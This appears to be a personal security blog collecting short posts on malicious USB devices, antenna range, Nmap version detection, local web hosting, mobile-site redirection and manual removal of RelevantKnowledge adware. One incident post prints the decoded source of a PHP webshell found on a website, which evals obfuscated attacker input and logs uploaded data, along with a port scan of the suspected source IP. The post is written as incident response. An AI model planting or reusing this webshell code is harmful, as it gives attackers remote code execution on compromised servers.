Malicious hardware devices

Now that many electronic devices are MIC (made in Cxxxx) and that they have a known hacking scene, are we safe from becoming another botnet in the world of crime?


Latest in the line is the iphone charger malware poc.
http://www.macworld.co.uk/ipad-iphone/news/?newsid=3450917


A very cool indepth article on "Plug and Prey: Malicious USB Devices"
http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices


And a very cool device "USB Rubber Ducky"

Next time think twice before plugging in any new devices you buy especially if it looks as cute as the yellow ducky.

Effective range of Wireless Router (dBi) antennas

Have you ever wondered what the antennas specification on wireless router meant ? (3dBi, 4dBi, 5dBi ....... ).

I was shopping for a wireless adapter they tend to have many configuration for antennas.
Amazon Alfa wireless usb adapter

Choose a antenna that meets your requirement.

9dBi dipole (1000m)==> signal far at the same horizontal elevation as the transmission point
7dbi dipole (620m)==> offers an optimal balance between range and elevation.
5dbi dipole (500m)==> over a couple of levels of a building
2dbi dipole (300m)==> If you are in a building and need to cover the rooms around you

More information if you are interested.
http://www.liveport.com/wireless-antenna-properties

Discovery of Webshell on Website

Discovered unknown php files located on a website.
When php file contains eval + gzinflate + base64_decode expect it to be malicious in nature.

eval gzinflate base64_decode PHP decoder:
http://www.tareeinternet.com/scripts/decrypt.php

After decoding the file, we get a webshell with fileupload capability.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); }
elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;


Updates 25 Jan 2013:
Findings from log indicates that 3 months ago someone from 80.237.132.113 uploaded the webshell using ftp account.
Possibility of entry from ftp brute force is very high as i know the original password is not that complex.
80.237.132.113 is a webserver under construction.

Host is up (0.30s latency).
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          ProFTPD
25/tcp   open  smtp         Exim smtpd
80/tcp   open  http         Apache httpd
110/tcp  open  pop3         Dovecot pop3d
137/tcp  open  netbios-ns?
138/tcp  open  netbios-dgm?
139/tcp  open  netbios-ssn?
143/tcp  open  imap         Dovecot imapd
465/tcp  open  ssl/smtp     Exim smtpd 4.X
587/tcp  open  smtp         Exim
993/tcp  open  ssl/imap     Dovecot imapd
995/tcp  open  ssl/pop3     Dovecot pop3d
2195/tcp open  unknown
3306/tcp open  mysql        MySQL 5.5.28-1~dotdeb.0-log

80.237.132.113 could just be another victim of the intruder.

Mitigation:
Change password.
Monitor files.

Detect Mobile and Perform Site redirection (modding detectmobilebrowsers scripts)

Background:
I was working on some freelance project on setting up mobile sites for local businesses and stumbled upon the problem of how best to redirect "clients" to the respective mobile site. After some careful consideration and research on Google this is what i came out with.

Goal:

1. Accurate detection of mobile devices with little future maintenance 
2. Warn clients of redirection and giving them the option to reject our goodwill
3. If client choose to view the full site, allow them to do so

====================================================================
 Sample modded JS can be found here. 

Summarized Solution:

1. Download modded JS.
2. Add js to your site.
   ..script src="js/detectmobilebrowser.js"..
   ..$(document).ready(function(){
           runDetect();
       });..
3. Add runSet() function at link to full site
   ...a href="http://thewanderingtech.blogspot.com" title="thewanderingtech.blogspot.com" target="_self" onClick="runSet()".........................
4. Done. Test. Enjoy

====================================================================

Long winded Solution + Thinking process:
Accurate detection of mobile devices with little future maintenance 
http://detectmobilebrowsers.com/ offers free script to detect mobile devices.
I chose to use the Javascript version of detectmobile as i want minimal disruption to how search engine crawl the Main Site. Think SEO.

Sample:

(function(a,b){if()window.location=b})..........................................(navigator.userAgent||navigator.vendor||window.opera,'http://www.google.com/');

The script works great, but i am not able to fulfill Goal 2 & 3. With such a compact script it could be daunting to Web developers who are not comfortable with coding. 


Warn clients of redirection and giving them the option to reject our goodwill
Simple solution using Confirm
Open detectmobilebrowser.js with a text editor of your choice.
Find
window.location=b
and Replace this string with
if(confirm('For best viewing experience we recommend redirecting to our mobile site')){window.location=b}
Save the js file and you are done. Feel free to change the message you want to display.

If client choose to view the full site, allow them to do so
Nothing is more frustrating than being forced to view a mobile site when all i want to do is view its full site on a mobile device. 
Simple solution using Cookie to track user's intention.

Create a cookie called view to track user's intention.
If from a mobile site, a user clicks on the link view full site, we know that this mobile user wants to visit the full page and does not want to be redirected to the mobile site.
We set the cookie to last 1 day.
Therefore the user would only get redirected to the mobile site the following day or if he/she clears the browser cookies.

From http://www.w3schools.com/js/js_cookies.asp i added these function to detectmobilebrowser.js.

function setCookie(c_name,value,exdays){ .. }

function getCookie(c_name) { ... }

runSet() function informs us that user wants to view our full site.

@JS

function runSet()
{
      var view = getCookie("view");
      setCookie("view","full",1);
}

@ html View Full Sit
a href="http://thewanderingtech.blogspot.com" title="thewanderingtech.blogspot.com" target="_self" onClick="runSet()">View Full Site

runDetect() function will trigger the mobile detection and redirection script as long as cookie "view" is not set to a value "full"

function runDetect(){
var view = getCookie("view");
if(view != "full"){
(function(a,b){if()w ...........  .........     ..........www.google.com/');
}

 Sample modded JS can be found here. 


sss

How NMAP Service Version Detection works

What is nmap: Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon. (wiki)

Apart from the basic host discovery and port scanning, Nmap offers service version detection by using the -sV option during scan.

SERVICE/VERSION DETECTION on Nmap 6.01:
  -sV: Probe open ports to determine service/version info
  --version-intensity : Set from 0 (light) to 9 (try all probes)
  --version-light: Limit to most likely probes (intensity 2)
  --version-all: Try every single probe (intensity 9)
  --version-trace: Show detailed version scan activity (for debugging)

HOW service/version detection in nmap works ???
In short Nmap probes a port and attempts to grab any available banner, then it matches the received banner with its database of banners. The database is stored in nmap directory within a file called nmap-service-probes.

Nmap uses regular expression to match the banner found. An example of how a detection of OpenSSH service works:

rule found in nmap-service-probes: 
match ssh m|^SSH-([\d.]+)-OpenSSH\r?\n$| p/OpenSSH/ i/protocol $1/ d/terminal server/
Green: tells nmap what service is matched
Blue: Determine if the banner received is in the following pattern
Red: Reply from nmap to us, informing us the version found

Linux Console:
Have netcat open a random port and send out a SSH string:
echo -ne "SSH-2.0-OpenSSH_2.5\r\n" | nc -l 222

Have nmap try a service detection on the port you have just opened: (I have chosen port 222)
nmap -sV -PN -p 222 127.0.0.1

[root@localhost user]# nmap -sV -PN -p 222 127.0.0.1

RESULT:
[root@localhost user]# nmap -sV -PN -p 222 127.0.0.1
Starting Nmap 5.51 ( http://nmap.org ) at 2012-07-13 19:51 PDT
PORT    STATE SERVICE VERSION
222/tcp open  ssh     OpenSSH 2.5 (protocol 2.0)

Additional Info:

For more info on regular expression or just testing it live:

http://www.regextester.com/

http://www.regular-expressions.info/reference.html/

Nmap:

http://nmap.org/download.html

Fast Guide to hosting webpages or website

Sharing my quick guide; how to host files with the least amount of time:

Want to host your own webpage on your own desktop ?? Not Tech Savvy or lazy to configure a proper server for hosting your pages?? Setting up Apache gives you a headache ??


If you merely need to host files without php/perl support AnalogX is a free and good tool i would recommend.
1) Download & Install it
http://www.analogx.com/contents/download/Network/sswww/Freeware.htm
2) Launch it

Click the middle box to select the directory you are serving your files from.
Click the start button and if your port 80 is not occupied the server should work.
Moment of truth:
Place an index.html file in the selected directory.
Surf to that index.html by typing http://127.0.0.1/index.html in your web browser.


If your site needs php, perl, ssl support, mysql and many more ..............
I would recommend this excellent tool Xammp
1) Download & Install xammp here.
http://www.apachefriends.org/en/xampp.html
2) Launch it here


Click start on the box beside Apache.
Place your files in \htdocs\
Surf to that index.html by typing http://127.0.0.1/index.html in your web browser.


oxymoron alert ................
For Linux users who are not tech savvy.
Most linux distribution should already have a server install by default.
Do a quick check by typing without quote "which httpd" in Terminal (linux version of cmd.exe).
If you see a path then congrats you already have a server.
If not install it with this command: yum install httpd
ps. if your linux distribution is no longer supported (EOL) then yum would not work.

Where should your html files be placed?
My default path is /var/www/
If yours is not the same path, then i would suggest searching httpd.conf for your root directory.

Default path to httpd.conf is /etc/httpd/conf/httpd.conf
To configure httpd server, edit the httpd.conf file and restart httpd server.
To start or restart your httpd server use this command: service httpd restart

How to remove persistent Malware (RelevantKnowledge)

Intro:
Search on google "RelevantKnowledge" and you could find instruction on its removal within the top 10 results.
In my post i will introduce a more generic step by step approach so you can remove most of the common malwares on your own.

Anyway i am writing this post because i was infected with a malware called RelevantKnowledge.

Summary Remove RelevantKnowledge on win7 64bit FAST:
1) Stop RelevantKnowledge service.
a) run msconfig
b) click msconfig -> service tab
c) find RelevantKnowledge and uncheck it
d) click apply and close msconfig

2) Reboot PC

3) Delete all the files from c:\Program Files (x86)\RelevantKnowledge\

For a more detailed info on malware removal read the rest of the entries.

General ideal of what a malware is:
A malware is simply a software that you do not want to on your pc.
Some would leech on your network, steal your credentials while others allow the "hacker" to use your pc.
It is very likely you have gotten infected from some malicious website.

After installating itself on your pc it would require a method to start itself up everytime you turn on your pc.
The few common ways for it to do that includes:
Run key
Service
Startup folder
Wmi

Case Study:From what i can observe Relevantknowledge is merely a nuisance generating ads pop-up when surfing the net.
I am running on Win7 64bit with no AV scanner installed.
So how did i found this bugger!!!I became suspicious after constantly receiving this pop-up while surfing the net.

I proceeded to look for suspicous run-key and services on my system.
Type msconfig in run or cmd.exe:
Startup tab are software that starts using run-keys.
Services tab are software that starts running as a service.

So how do i tell what is suspicious??
Spelling errors/Unknown programs/Unknown or missing manufacturer info
Next google for those suspicious software to verify whether they are authentic or not.

And that is how i caught RelevantKnowledge which installed itself as a service call "RelevantKnowledge".

Next to find out where it is installed on my system
I prefer to use regedit, export hklm and search for the keys in my own text editor. You can also choose to search from regedit directly but i do not recommend that.
Highlight Hkey_Local_Machine => ctl+f => export => save it to desktop as hklm.reg

open hklm.reg using a text editor, i recommend ultraedit or notepad++ and search for relevantknowledge.

Based on the filtered results i know it is installed in "C:\Program Files (x86)\RelevantKnowledge\".
A total of 36 unwanted registry entries.
I repeated the above steps for HKey_Current_User (hkcu). Seems RelevantKnowledge did not have any entry in HKCU.

So what does HKCU or HKLM imply?
HKCU would imply that the software started by this registry key is having current user rights
HKLM would imply that the software started by this registry key is having system rights

Next step -> Remove Startup from Registry
This step will ensure that on the next reboot the malware will not run.
So there are 36 entries, you could choose to remove them all or remove just the services or runkeys if any.
\services\
\run\

Filtered results
"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\RelevantKnowledge]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RelevantKnowledge]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RelevantKnowledge]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RelevantKnowledge]"

Command to delete registry entry in cmd.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\RelevantKnowledge"
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RelevantKnowledge"
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RelevantKnowledge"
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RelevantKnowledge"

Finally -> Delete physical files:
This is where the malware reside. But i cannot delete all the files yet because the malware is still running.
RelevantKnowledge runs both exe files and also hooks dlls to running process such as chrome.exe

To check if the malware is running i prefer to use the traditional cmd.exe (run as administrator).
use tasklist command to check for running exe. Search and see if any of the RelevantKnowledge exe are running.

use tasklist /m to check for any dll loaded by the malware.

So they are running what can i do ?

The easiest way is to reboot your pc and if you have deleted the registry keys successfully then it should not be loaded on the next startup.

The alternative method (not recommended) requires you to taskkill all malware related exe, meaning even legit exe chrome.exe that the malware dll was loaded to must be killed off.

After the malwares are unloaded, proceed to delete the physical files.

Now your malware should be deleted. Do note there are many variants of these buggers. Some includes watchdog process which installs the malware if it detects that it is not running or not started. In such case we do need to find where the watchdog process is hiding in the system and delete it together with the malware.